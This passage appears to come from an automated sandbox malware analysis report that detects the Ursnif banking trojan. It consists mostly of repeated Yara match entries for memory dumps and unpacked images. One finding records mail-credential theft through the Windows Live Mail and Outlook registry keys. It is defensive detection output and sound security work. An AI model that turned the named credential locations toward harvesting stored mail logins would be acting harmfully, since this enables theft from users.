Source: Yara match File source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
Source: Yara match File source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
Source: Yara match File source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
[Map legend residue; the image itself is not present in the report text. Shading thresholds by number of contacted IPs: below 25%, 25% to 50%, 50% to 75%, above 75%.]